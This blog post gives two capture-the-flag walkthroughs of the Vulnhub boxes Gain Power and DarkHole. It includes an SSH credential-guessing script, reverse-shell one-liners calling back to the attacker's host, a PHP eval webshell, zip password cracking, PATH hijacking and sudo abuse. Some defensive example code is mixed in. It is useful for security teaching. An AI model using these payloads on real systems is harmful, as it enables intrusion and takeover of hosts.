Vulnhub: Gain Power, Detailed Walkthrough

Posted by Jason_huawen


Gain Power

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/Gainpower]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24

Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                        

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:05      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:a1:99:30      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.254  08:00:27:57:a3:c2      1      60  PCS Systemtechnik GmbH        

Using the netdiscover tool on Kali Linux, the target host's IP address is identified as 192.168.56.254.

Nmap scan

┌──(kali㉿kali)-[~/Vulnhub/Gainpower]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-01 09:14 EDT
Nmap scan report for bogon (192.168.56.254)
Host is up (0.00015s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 88416111e11f187dd60c38292579162c (RSA)
|   256 18c5fdcecd2b92f8d9171721249d67df (ECDSA)
|_  256 84c514e4e93321416a9272b9a7331aea (ED25519)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS))
|_http-title: Watch shop | eCommers
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS)
8000/tcp open  http    Ajenti http control panel
|_http-title: Ajenti
MAC Address: 08:00:27:57:A3:C2 (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.86 seconds

The Nmap results show three open ports on the target host: 22 (ssh), 80 (http) and 8000 (http).

Getting a shell

┌──(kali㉿kali)-[~/Vulnhub/Gainpower]
└─$ nikto -h http://192.168.56.254/ 
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.254
+ Target Hostname:    192.168.56.254
+ Target Port:        80
+ Start Time:         2023-05-01 09:17:44 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.6 (CentOS)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.4.6 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD, TRACE 
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3092: /readme.txt: This might be interesting...
+ OSVDB-3268: /secret/: Directory indexing found.
+ OSVDB-3092: /secret/: This might be interesting...
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.html: Admin login page/section found.
+ OSVDB-3092: /test.php: This might be interesting...
+ 8725 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2023-05-01 09:18:38 (GMT-4) (54 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

nikto finds the directory /secret. Browsing it and downloading the image files it contains to Kali Linux for analysis,

the image analysis turns up nothing of interest.

└─$ ssh root@192.168.56.254                                        
The authenticity of host '192.168.56.254 (192.168.56.254)' can't be established.
ED25519 key fingerprint is SHA256:1yR5iTL+oNBeYI7ACvh1p8CYWHrzXAiOC+CSijIO9uQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.254' (ED25519) to the list of known hosts.
Hi !!! THIS MESSAGE IS ONLY VISIBLE IN OUR NETWORK :) 

   ___      _        ___                    
  / __|__ _(_)_ _   | _ \_____ __ _____ _ _ 
 | (_ / _` | | ' \  |  _/ _ \ V  V / -_) '_|
  \___\__,_|_|_||_| |_| \___/\_/\_/\___|_|  


I HOPE EVERYONE KNOW THE JOINING ID CAUSE THAT IS YOUR USERNAME : ie : employee1 employee2 ... ... ... so on ;)

I already told the format of password of everyone in the yesterday's metting.

Now i have configured everything. My request is to everyone to Complete assignments on time 

btw one of my employee have sudo powers because he is my favourite 

NOTE : "This message will automatically removed after 2 days" 
                                                                - BOSS

root@192.168.56.254's password: 

Assume the username is employee1. Going by the author's hint, the password probably follows a pattern tied to the username, for example being identical to it.

The home directory shows coworker, helper and employee accounts, and only one of the employees has sudo rights, so a script is needed to find out which employee that is.

import paramiko
import sys
import time

class GainPowerCls:
    def __init__(self) -> None:
        self.host = '192.168.56.254'   # IP address of the target virtual machine
        print("Target: %s" % self.host)
        try:
            self.ssh_client = paramiko.SSHClient()
            # Lab target: accept an unknown host key instead of consulting known_hosts
            self.ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        except Exception as e:
            print("Something is wrong: %s" % e)
            sys.exit()

    def run_sudo(self, username, password):
        try:
            print('Attempt to access by %s: %s' % (username, password))
            self.ssh_client.connect(hostname=self.host, username=username, password=password)
            # The underlying Transport object for this SSH connection, used to open channels
            transport = self.ssh_client.get_transport()
            # Request a new channel of type "session" (an alias for open_channel("session"))
            session = transport.open_session()
            # Combine stderr into stdout so the sudo prompt and the command output are read together
            session.set_combine_stderr(True)
            # Request a pseudo-terminal: sudo needs a tty to prompt for the password
            session.get_pty()
            session.exec_command('sudo -l')
            stdin = session.makefile('wb', -1)
            stdout = session.makefile('rb', -1)
            # Answer the sudo password prompt, then read everything the command printed
            stdin.write(password + '\n')
            stdin.flush()
            print(stdout.read().decode('utf-8'))
            session.close()
            self.ssh_client.close()
        except Exception as e:
            # A failed login for one account must not abort the whole loop
            print(e)
            self.ssh_client.close()

    def run(self):
        for i in range(1, 101):
            username = 'employee' + str(i)
            password = 'employee' + str(i)
            self.run_sudo(username, password)
            print('*' * 150)
            time.sleep(1)

if __name__ == '__main__':
    client = GainPowerCls()
    client.run()

Running the Python script above shows that employee64 has sudo rights:

employee64
[sudo] password for employee64: 
Matching Defaults entries for employee64 on localhost:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
    env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
    env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
    env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
    env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User employee64 may run the following commands on localhost:
    (programmer) /usr/bin/unshare

******************************************************************************************************************************************************
┌──(kali㉿kali)-[~/Vulnhub/Gainpower]
└─$ ssh employee64@192.168.56.254
Hi !!! THIS MESSAGE IS ONLY VISIBLE IN OUR NETWORK :) 

   ___      _        ___                    
  / __|__ _(_)_ _   | _ \_____ __ _____ _ _ 
 | (_ / _` | | ' \  |  _/ _ \ V  V / -_) '_|
  \___\__,_|_|_||_| |_| \___/\_/\_/\___|_|  


I HOPE EVERYONE KNOW THE JOINING ID CAUSE THAT IS YOUR USERNAME : ie : employee1 employee2 ... ... ... so on ;)

I already told the format of password of everyone in the yesterday's metting.

Now i have configured everything. My request is to everyone to Complete assignments on time 

btw one of my employee have sudo powers because he is my favourite 

NOTE : "This message will automatically removed after 2 days" 
                                                                - BOSS

employee64@192.168.56.254's password: 
Permission denied, please try again.
employee64@192.168.56.254's password: 
Last failed login: Mon May  1 22:34:48 EDT 2023 from 192.168.56.206 on ssh:notty
There was 1 failed login attempt since the last successful login.
Last login: Mon May  1 22:30:52 2023 from 192.168.56.206
[employee64@localhost ~]$ id
uid=1063(employee64) gid=1063(employee64) groups=1063(employee64) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

Using unshare to run bash in a new namespace gives a shell as programmer:

[employee64@localhost ~]$ sudo -u programmer /usr/bin/unshare /bin/bash
[sudo] password for employee64: 
bash-4.2$ id
uid=1182(programmer) gid=1184(prome) groups=1184(prome) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
bash-4.2$ 

That gives us a shell as programmer.

bash-4.2$ pwd
/media/programmer/scripts
bash-4.2$ cat backup.sh 
#!/bin/bash
cp /var/www/html/thisiscarddetails.txt /tmp/back.txt

There is a script in /media/programmer/scripts that is executed periodically.

Upload the pspy64 tool to the target's /tmp directory:

bash-4.2$ cd /tmp
bash-4.2$ wget http://192.168.56.206:8000/pspy64
--2023-05-01 22:42:29--  http://192.168.56.206:8000/pspy64
Connecting to 192.168.56.206:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: ‘pspy64’

100%[====================================================================================>] 3,104,768   --.-K/s   in 0.01s   

2023-05-01 22:42:29 (235 MB/s) - ‘pspy64’ saved [3104768/3104768]

bash-4.2$ chmod +x pspy64 
2023/05/01 22:44:01 CMD: UID=1183  PID=25118  | /bin/bash /media/programmer/scripts/backup.sh

So backup.sh is run periodically by the user with UID 1183.

Checking /etc/passwd shows that UID 1183 is the user vanshal.

bash-4.2$ ls -alh
total 4.0K
drwxr-xr-x. 2 programmer prome 23 May 18  2020 .
drwxrwx---. 3 programmer prome 21 Aug  8  2019 ..
-rwxr-xr-x. 1 programmer prome 65 May 18  2020 backup.sh

The programmer user has write permission on backup.sh.
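The misconfiguration here is a scheduled script that one account (vanshal) executes while another account (programmer) can write it. As an added example, not from the walkthrough or the box, the Python below parses a pspy CMD line in the format shown above and audits the script's ownership and mode against the UID that runs it; the pspy line and the backup.sh ownership values are constructed from the output quoted in this writeup, and the regex and function names are my own.

```python
import os
import re
import stat

# Constructed to match the pspy line captured on the box (the cron job that
# runs backup.sh as UID 1183) and what `ls -alh` showed for the script:
# owner programmer (uid 1182), group prome (gid 1184), mode -rwxr-xr-x.
PSPY_LINE = ("2023/05/01 22:44:01 CMD: UID=1183  PID=25118  "
             "| /bin/bash /media/programmer/scripts/backup.sh")
BOX_FILES = {"/media/programmer/scripts/backup.sh": (1182, 1184, 0o755)}

# UID, PID, then the command; an interpreter such as /bin/bash or /bin/sh in
# front of the script is skipped so the script path itself is captured.
PSPY_RE = re.compile(r"UID=(\d+)\s+PID=\d+\s+\|\s+(?:\S*/(?:ba)?sh\s+)?(\S+)")

def parse_pspy_line(line):
    """Return (uid, path) for a pspy CMD line, or None if it does not match."""
    m = PSPY_RE.search(line)
    return (int(m.group(1)), m.group(2)) if m else None

def audit(owner_uid, group_gid, mode, run_uid):
    """Findings for a file executed as run_uid: anyone who can write it runs
    code as run_uid, so flag every writer other than run_uid itself."""
    findings = []
    if owner_uid != run_uid and mode & stat.S_IWUSR:
        findings.append("owned by uid %d, executed as uid %d" % (owner_uid, run_uid))
    if mode & stat.S_IWGRP:
        findings.append("group %d can write" % group_gid)
    if mode & stat.S_IWOTH:
        findings.append("world-writable")
    return findings

def audit_path(path, run_uid):
    """Same check against the live filesystem."""
    st = os.stat(path)
    return audit(st.st_uid, st.st_gid, st.st_mode, run_uid)

def audit_pspy(lines, known=BOX_FILES):
    """Map each script seen in pspy output to its findings. Paths listed in
    `known` use the recorded ownership so the example runs off the box;
    anything else that exists locally is stat'ed."""
    results = {}
    for line in lines:
        parsed = parse_pspy_line(line)
        if parsed is None:
            continue
        uid, path = parsed
        if path in known:
            results[path] = audit(*known[path], run_uid=uid)
        elif os.path.exists(path):
            results[path] = audit_path(path, uid)
    return results
```

The same check applied to real pspy output and a live filesystem is how a defender would catch this before someone appends a reverse shell to the script.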

bash-4.2$ echo 'bash -i >& /dev/tcp/192.168.56.206/5555 0>&1' >> backup.sh 
┌──(kali㉿kali)-[~/Vulnhub/Gainpower]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.254] 51130
bash: no job control in this shell
[vanshal@localhost ~]$ id
id
uid=1183(vanshal) gid=1184(prome) groups=1184(prome) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
You have mail in /var/mail/vanshal

After a short wait we get a shell as vanshal.

[vanshal@localhost ~]$ cat loc
cat local.txt 

                ░██████╗░░█████╗░██╗███╗░░██╗  ██████╗░░█████╗░░██╗░░░░░░░██╗███████╗██████╗░
                ██╔════╝░██╔══██╗██║████╗░██║  ██╔══██╗██╔══██╗░██║░░██╗░░██║██╔════╝██╔══██╗
                ██║░░██╗░███████║██║██╔██╗██║  ██████╔╝██║░░██║░╚██╗████╗██╔╝█████╗░░██████╔╝
                ██║░░╚██╗██╔══██║██║██║╚████║  ██╔═══╝░██║░░██║░░████╔═████║░██╔══╝░░██╔══██╗
                ╚██████╔╝██║░░██║██║██║░╚███║  ██║░░░░░╚█████╔╝░░╚██╔╝░╚██╔╝░███████╗██║░░██║
                ░╚═════╝░╚═╝░░╚═╝╚═╝╚═╝░░╚══╝  ╚═╝░░░░░░╚════╝░░░░╚═╝░░░╚═╝░░╚══════╝╚═╝░░╚═╝


                   You successfully owned the user of this box :-) Best of Luck for the root 


flag: 5c2a29d7b95868da9e503502f301e8dd

Twitter : VanshalG

That is the user flag.

The home directory contains the file secret.zip; download it to Kali Linux.

┌──(kali㉿kali)-[~/Vulnhub/Gainpower]
└─$ wget http://192.168.56.254:9999/secret.zip
--2023-05-01 22:52:19--  http://192.168.56.254:9999/secret.zip
Connecting to 192.168.56.254:9999... connected.
HTTP request sent, awaiting response... 200 OK
Length: 439 [application/zip]
Saving to: ‘secret.zip’

secret.zip                      100%[=====================================================>]     439  --.-KB/s    in 0s      

2023-05-01 22:52:19 (1.52 MB/s) - ‘secret.zip’ saved [439/439]
┌──(kali㉿kali)-[~/Vulnhub/Gainpower]
└─$ unzip secret.zip    
Archive:  secret.zip
[secret.zip] Mypasswords.txt password:                                                                                                                               
┌──(kali㉿kali)-[~/Vulnhub/Gainpower]
└─$ zip2john secret.zip > secret_hash
ver 2.0 efh 5455 efh 7875 secret.zip/Mypasswords.txt PKZIP Encr: TS_chk, cmplen=243, decmplen=257, crc=BC7A971B ts=7F46 cs=7f46 type=8

┌──(kali㉿kali)-[~/Vulnhub/Gainpower]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt secret_hash 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
81237900         (secret.zip/Mypasswords.txt)     
1g 0:00:00:00 DONE (2023-05-01 22:53) 6.250g/s 4480Kp/s 4480Kc/s 4480KC/s AnThOnY..741210
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

The archive password is cracked.

┌──(kali㉿kali)-[~/Vulnhub/Gainpower]
└─$ unzip secret.zip
Archive:  secret.zip
[secret.zip] Mypasswords.txt password: 
  inflating: Mypasswords.txt         

┌──(kali㉿kali)-[~/Vulnhub/Gainpower]
└─$ cat Mypasswords.txt               
aTQ!vYxQUh3$&uaN3p%@_ax#Ab2XNZ!5$rFh$@bDMyxt#&Q2L&4+DvDT?A!MPKK9sFq-V8_d$5gQLKyKhf-4&S=_m^Cx?bZYf8Bv%%*H^GcvDc4ayfPk^HWs8bnD%Ayk3$5WP6_K?a6_%MF&e-DS2ZZ$m93BL3CY!huQDM2-JZcMSMKT8K*Z7zLPGATU7JP&x#JtaZHAbM^%$TK%C3ubXV4#e87M6P-puXTTMbzuP5y4qX6Uzd%ed8Ux_vMX=pCB

With this password we can log into the Ajenti panel on port 8000 as the user root.

It provides a web shell that can run any command.

bash -i >& /dev/tcp/192.168.56.206/8888 0>&1
┌──(kali㉿kali)-[~/Vulnhub/Gainpower]
└─$ sudo nc -nlvp 8888                                         
[sudo] password for kali: 
listening on [any] 8888 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.254] 45550
[root@localhost /]# id
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
[root@localhost /]# cd /root
cd /root
[root@localhost root]# ls -alh
ls -alh
total 28K
dr-xr-x---.  3 root root  132 Jun 21  2020 .
dr-xr-xr-x. 18 root root  240 Aug  7  2019 ..
-rw-r--r--.  1 root root   18 Dec 28  2013 .bash_logout
-rw-r--r--.  1 root root  176 Dec 28  2013 .bash_profile
-rw-r--r--.  1 root root  176 Dec 28  2013 .bashrc
-rw-r--r--.  1 root root  100 Dec 28  2013 .cshrc
drwxr-----.  3 root root   19 Aug  7  2019 .pki
-rw-r--r--.  1 root root 2.1K May 18  2020 proof.txt
-rw-------.  1 root root 1.0K Aug  7  2019 .rnd
-rw-r--r--.  1 root root  129 Dec 28  2013 .tcshrc
[root@localhost root]# cat proof.txt
cat proof.txt

        ░██████╗░░█████╗░██╗███╗░░██╗  ██████╗░░█████╗░░██╗░░░░░░░██╗███████╗██████╗░
        ██╔════╝░██╔══██╗██║████╗░██║  ██╔══██╗██╔══██╗░██║░░██╗░░██║██╔════╝██╔══██╗
        ██║░░██╗░███████║██║██╔██╗██║  ██████╔╝██║░░██║░╚██╗████╗██╔╝█████╗░░██████╔╝
        ██║░░╚██╗██╔══██║██║██║╚████║  ██╔═══╝░██║░░██║░░████╔═████║░██╔══╝░░██╔══██╗
        ╚██████╔╝██║░░██║██║██║░╚███║  ██║░░░░░╚█████╔╝░░╚██╔╝░╚██╔╝░███████╗██║░░██║
        ░╚═════╝░╚═╝░░╚═╝╚═╝╚═╝░░╚══╝  ╚═╝░░░░░░╚════╝░░░░╚═╝░░░╚═╝░░╚══════╝╚═╝░░╚═╝

_________                                     __        .__          __  .__               
\_   ___ \  ____   ____    ________________ _/  |_ __ __|  | _____ _/  |_|__| ____   ____  
/    \  \/ /  _ \ /    \  / ___\_  __ \__  \\   __\  |  \  | \__  \\   __\  |/  _ \ /    \ 
\     \___(  <_> )   |  \/ /_/  >  | \// __ \|  | |  |  /  |__/ __ \|  | |  (  <_> )   |  \
 \______  /\____/|___|  /\___  /|__|  (____  /__| |____/|____(____  /__| |__|\____/|___|  /
        \/            \//_____/            \/                     \/                    \/ 


You successfully owned the root of this box :-)

Flag: eb2e174c3883ff6b5fd871167795b4d6

Twitter : VanshalG
[root@localhost root]# 

Vulnhub: DARKHOLE: 1 Penetration Test

1. Machine overview

Description
Difficulty: Easy

It’s a box for beginners, but not easy, Good Luck

Hint: Don’t waste your time For Brute-Force
Link: machine download page.
Kali: 192.168.110.128
Target: 192.168.110.136

2. Information gathering

First, scan for the target's IP address.

Then scan for open ports and services.

The target has ports 22 and 80 open; naturally, visit port 80 first, which shows a website.

Viewing the page and auditing its source reveals nothing important.
Click login to reach the login page.

The machine description tells us not to brute-force, but we can register an account. Click "sign up now" and register one (test01:123456).

After registering successfully, log into the system.

The only features available are updating profile information and changing the password.

3. Broken access control

Change the password and capture the request with Burp Suite.

To test for an authorization flaw, change the parameter to id=1.

It turns out the flaw exists: we have changed the password of the account with id=1 (admin) to 111111.

Logging in with the administrator account (admin:111111), an extra file upload feature appears.
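The flaw is that the password-change request carries the account id and the server trusts it. As an added example, not the box's PHP, the Python below shows the handler both ways, using an in-memory dict in place of the site's users table with the ids from this walkthrough (id=1 admin, the self-registered test01 as id 2); the function names and the stored passwords are constructed.

```python
# Added example, not the box's code. An in-memory dict stands in for the
# site's users table; the ids follow the walkthrough, the passwords are made up.

def make_users():
    """Fresh copy of the constructed user table for each run."""
    return {
        1: {"name": "admin", "password": "s3cret"},
        2: {"name": "test01", "password": "123456"},
    }

def change_password_vulnerable(session_uid, form, users):
    """Trusts the id field from the request body: any logged-in user can
    rewrite any other account's password by editing id=... in the request."""
    target = int(form.get("id", session_uid))
    users[target]["password"] = form["password"]
    return target

def change_password_fixed(session_uid, form, users):
    """The account to modify comes only from the server-side session. A
    submitted id that disagrees with the session is rejected rather than
    silently ignored, because it is a tampering signal worth logging."""
    if "id" in form and int(form["id"]) != session_uid:
        raise PermissionError(
            "user %d attempted to modify account %s" % (session_uid, form["id"]))
    users[session_uid]["password"] = form["password"]
    return session_uid

def replay_walkthrough():
    """Replay the id=1 tampering from the writeup against both handlers and
    return admin's password afterwards as (vulnerable, fixed)."""
    tampered = {"id": "1", "password": "111111"}
    vulnerable = make_users()
    change_password_vulnerable(2, tampered, vulnerable)
    fixed = make_users()
    try:
        change_password_fixed(2, tampered, fixed)
    except PermissionError:
        pass
    return vulnerable[1]["password"], fixed[1]["password"]
```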

4. Getting a shell through file upload

First, upload a PHP file with the content:

<?php @eval($_POST['cmd']); ?>

But it returns an error; presumably there is a blacklist check on the extension.

Changing the extension to .phtml and uploading again succeeds, and the response discloses the upload path.

Connecting with AntSword gives a shell.
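The upload filter failed because it denied known PHP extensions instead of allowing only the types the feature needs, so .phtml, which the web server also hands to PHP, went through. As an added example, not the box's code, the Python below puts such a blacklist check next to an allowlist check and a server-chosen filename; the deny list is a constructed guess, since the real filter is not shown in the writeup.

```python
import secrets

# Added example, not the box's code. The deny list is a constructed guess at
# what the upload filter on the box checks; the real list is not shown.
BLACKLIST = {"php", "php3", "php4", "php5", "phps"}

# What an image-upload feature actually needs to accept.
ALLOWLIST = {"png", "jpg", "jpeg", "gif"}

def blacklist_check(filename):
    """The weak check: accept unless the last extension is on the deny list.
    .phtml is not listed, so it is accepted, as are double extensions."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext not in BLACKLIST

def allowlist_check(filename):
    """The strong check: no path or NUL characters, exactly one extension,
    and that extension must be on the allow list."""
    if "\x00" in filename or "/" in filename or "\\" in filename:
        return False
    parts = filename.split(".")
    if len(parts) != 2 or not parts[0]:
        return False
    return parts[1].lower() in ALLOWLIST

def stored_name(filename):
    """Server-chosen name for the saved file: the client's name never reaches
    the filesystem, only its validated extension does. None means rejected."""
    if not allowlist_check(filename):
        return None
    return "%s.%s" % (secrets.token_hex(8), filename.split(".")[1].lower())

def compare(names):
    """(blacklist_check, allowlist_check) verdicts for each upload name."""
    return {n: (blacklist_check(n), allowlist_check(n)) for n in names}
```

Extension checks only decide what gets saved; the upload directory should additionally be served without script execution so a mistake in the filter does not become remote code execution.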

5. Reverse shell to Kali

Next, we send a reverse shell to Kali.
Create a file xxx.sh, make it executable, with the content:

#!/bin/bash
bash -i >& /dev/tcp/192.168.110.128/7788 0>&1

Start an nc listener on Kali and run xxx.sh from the AntSword terminal; the reverse shell connects.

Our current privileges are still low, so the next step is privilege escalation.

/etc/passwd shows that we need to escalate first to john or darkhole.

/var/www/html/config contains the database connection file.

In /home/john there is a binary, toto, with the setuid bit set.

toto is a copy of "id"; running it shows that it executes the id command as john.

6. Getting a shell as john

We can exploit this behaviour: create a new file named id locally, write /bin/bash into it, make it executable, then prepend its directory to PATH (which is searched front to back). The id command then resolves to our file first, and running toto, which invokes id as john, gives us a shell:

echo '/bin/bash' > /tmp/id;chmod +x /tmp/id;export PATH=/tmp:$PATH


The flag is in user.txt, and the file password contains the password root123.

Log in to the john account.

7. Getting root

Next is escalating to root; first, check which commands can be run with sudo.

The user can edit and then run a Python script as root.

So adding a command that spawns a shell to the Python script and running it with sudo gives root:

echo 'import os;os.system("/bin/bash")' > file.py
sudo python3 /home/john/file.py
